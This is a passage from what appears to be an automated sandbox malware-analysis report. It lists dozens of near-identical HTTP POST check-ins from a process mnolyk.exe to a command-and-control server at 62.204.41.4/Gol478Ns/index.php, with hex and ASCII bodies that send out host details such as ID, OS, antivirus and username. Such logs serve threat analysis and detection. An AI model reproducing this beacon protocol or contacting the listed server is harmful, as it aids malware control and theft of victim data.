                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:08.178375959 CET778INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:08 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            591192.168.2.45028662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:40:08.361526966 CET779OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:08.423818111 CET779INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:08 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            592192.168.2.45028762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:40:08.597774982 CET780OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:08.659910917 CET780INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:08 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            593192.168.2.45028862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:40:08.838915110 CET781OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:08.902780056 CET781INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:08 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            594192.168.2.45028962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:40:09.090061903 CET782OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:09.153785944 CET782INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:09 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            595192.168.2.45029062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:40:09.328460932 CET783OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:09.391062021 CET783INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:09 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            596192.168.2.45029162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:40:09.560444117 CET784OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:09.623384953 CET784INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:09 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            597192.168.2.45029262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:40:09.795778036 CET785OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:09.858160973 CET785INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:09 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            598192.168.2.45029362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:40:10.028486967 CET786OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:10.091244936 CET786INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:10 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            599192.168.2.45029462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:40:10.272901058 CET787OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:10.336535931 CET787INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:10 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            6192.168.2.44970162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:25.852741003 CET195OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:25.916302919 CET195INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:25 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            60192.168.2.44975562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:41.418675900 CET249OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:41.481945038 CET249INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:41 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            600192.168.2.45029562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:40:10.522022009 CET788OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:10.586210966 CET788INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:10 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            601192.168.2.45029662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:40:10.763881922 CET789OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:10.827420950 CET789INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:10 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            602192.168.2.45029762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:40:11.003849983 CET790OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:11.070122004 CET790INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:11 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            603192.168.2.45029862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:40:11.262830019 CET791OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:11.327487946 CET791INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:11 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            604192.168.2.45029962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:40:11.500143051 CET792OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:11.562865973 CET792INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:11 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            605192.168.2.45030062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:40:11.733230114 CET793OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:11.798274994 CET793INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:11 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            606192.168.2.45030162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:40:11.986985922 CET794OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:12.053431988 CET794INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:12 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            607192.168.2.45030262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:40:12.239778042 CET795OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:12.303134918 CET795INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:12 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            608192.168.2.45030362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:40:12.489379883 CET796OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:40:12.552189112 CET796INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:40:12 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            609192.168.2.45030462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:40:12.743685007 CET797OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
